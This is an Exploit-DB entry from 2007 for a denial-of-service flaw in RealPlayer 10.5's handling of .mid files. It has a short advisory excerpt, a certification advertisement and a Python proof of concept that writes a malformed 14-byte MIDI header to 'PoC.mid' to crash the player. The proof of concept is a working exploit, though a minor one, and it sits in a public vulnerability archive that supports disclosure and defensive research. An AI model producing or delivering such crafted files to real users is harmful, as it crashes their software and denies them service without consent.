RealNetwork RealPlayer 10.5 - '.MID' File Handling Remote Denial of Service

EDB-ID:

29455

CVE:

N/A


Author:

shinnai

Type:

dos


Platform:

Windows

Date:

2007-01-15


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

source: https://www.securityfocus.com/bid/22050/info

RealNetwork RealPlayer is prone to a remote denial-of-service vulnerability because the application fails to handle specially crafted files.

Exploiting this issue allows remote attackers to crash the application, denying further service to legitimate users. Arbitrary code execution might be possible, but this is not confirmed.

Version 10.5 is vulnerable to this issue; other versions may also be affected. 

print "-----------------------------------------------------------------------"
print "# RealPlayer 10.5 .mid file Denial of Service"
print "# author: shinnai"
print "# mail: shinnai[at]autistici[dot]org"
print "# site: http://shinnai.altervista.org"
print "# Tested on Windows XP Professional SP2 all patched"
print "-----------------------------------------------------------------------"

fileOut = open('PoC.mid','wb')
fileOut.write('\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00')
fileOut.close()